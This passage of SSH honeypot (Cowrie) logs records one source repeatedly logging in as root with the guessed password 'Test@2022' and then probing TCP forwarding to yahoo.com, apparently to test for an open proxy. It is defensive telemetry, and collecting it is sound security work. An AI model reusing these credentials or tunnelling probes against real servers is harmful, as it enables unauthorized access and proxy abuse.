hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:57.430117Z","src_ip":"213.209.150.239","session":"e1ea3303e96a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:57.712657Z","src_ip":"213.209.150.239","session":"e1ea3303e96a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":27125,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:27125","sensor":"my-vps","timestamp":"2025-08-26T01:02:57.770047Z","session":"e1ea3303e96a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:57.826687Z","src_ip":"213.209.150.239","session":"e1ea3303e96a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":6855,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:6855","sensor":"my-vps","timestamp":"2025-08-26T01:02:57.982927Z","session":"e1ea3303e96a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.039451Z","src_ip":"213.209.150.239","session":"e1ea3303e96a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.096973Z","src_ip":"213.209.150.239","session":"e1ea3303e96a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25018,"dst_ip":"1.2.3.4","dst_port":22,"session":"f636bc4af9a4","protocol":"ssh","message":"New connection: 213.209.150.239:25018 (1.2.3.4:22) [session: f636bc4af9a4]","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.152508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.153491Z","src_ip":"213.209.150.239","session":"f636bc4af9a4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.210108Z","src_ip":"213.209.150.239","session":"f636bc4af9a4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.492800Z","src_ip":"213.209.150.239","session":"f636bc4af9a4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":20582,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:20582","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.550530Z","session":"f636bc4af9a4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.607211Z","src_ip":"213.209.150.239","session":"f636bc4af9a4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":6050,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:6050","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.762927Z","session":"f636bc4af9a4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.819657Z","src_ip":"213.209.150.239","session":"f636bc4af9a4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.877078Z","src_ip":"213.209.150.239","session":"f636bc4af9a4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25068,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cae6973fe01","protocol":"ssh","message":"New connection: 213.209.150.239:25068 (1.2.3.4:22) [session: 4cae6973fe01]","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.923395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.924578Z","src_ip":"213.209.150.239","session":"4cae6973fe01"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:58.971702Z","src_ip":"213.209.150.239","session":"4cae6973fe01"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:59.206631Z","src_ip":"213.209.150.239","session":"4cae6973fe01"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":15099,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:15099","sensor":"my-vps","timestamp":"2025-08-26T01:02:59.254916Z","session":"4cae6973fe01"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:59.302231Z","src_ip":"213.209.150.239","session":"4cae6973fe01"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":2508,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2508","sensor":"my-vps","timestamp":"2025-08-26T01:02:59.437595Z","session":"4cae6973fe01"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:59.484903Z","src_ip":"213.209.150.239","session":"4cae6973fe01"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:59.534239Z","src_ip":"213.209.150.239","session":"4cae6973fe01"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25108,"dst_ip":"1.2.3.4","dst_port":22,"session":"46ce3e4b60e8","protocol":"ssh","message":"New connection: 213.209.150.239:25108 (1.2.3.4:22) [session: 46ce3e4b60e8]","sensor":"my-vps","timestamp":"2025-08-26T01:02:59.589868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:59.590526Z","src_ip":"213.209.150.239","session":"46ce3e4b60e8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:59.647246Z","src_ip":"213.209.150.239","session":"46ce3e4b60e8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:59.929635Z","src_ip":"213.209.150.239","session":"46ce3e4b60e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":9648,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9648","sensor":"my-vps","timestamp":"2025-08-26T01:02:59.987056Z","session":"46ce3e4b60e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.043710Z","src_ip":"213.209.150.239","session":"46ce3e4b60e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":28727,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:28727","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.199013Z","session":"46ce3e4b60e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.255736Z","src_ip":"213.209.150.239","session":"46ce3e4b60e8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.313288Z","src_ip":"213.209.150.239","session":"46ce3e4b60e8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25165,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1b83e96a518","protocol":"ssh","message":"New connection: 213.209.150.239:25165 (1.2.3.4:22) [session: b1b83e96a518]","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.359689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.360424Z","src_ip":"213.209.150.239","session":"b1b83e96a518"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.407630Z","src_ip":"213.209.150.239","session":"b1b83e96a518"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.642519Z","src_ip":"213.209.150.239","session":"b1b83e96a518"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":17194,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:17194","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.691158Z","session":"b1b83e96a518"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.738452Z","src_ip":"213.209.150.239","session":"b1b83e96a518"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":12261,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:12261","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.873807Z","session":"b1b83e96a518"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.921380Z","src_ip":"213.209.150.239","session":"b1b83e96a518"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:00.969362Z","src_ip":"213.209.150.239","session":"b1b83e96a518"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25225,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee6ee90faa9b","protocol":"ssh","message":"New connection: 213.209.150.239:25225 (1.2.3.4:22) [session: ee6ee90faa9b]","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.016026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.016892Z","src_ip":"213.209.150.239","session":"ee6ee90faa9b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.065018Z","src_ip":"213.209.150.239","session":"ee6ee90faa9b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.301731Z","src_ip":"213.209.150.239","session":"ee6ee90faa9b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":9875,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9875","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.350895Z","session":"ee6ee90faa9b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.398737Z","src_ip":"213.209.150.239","session":"ee6ee90faa9b"}
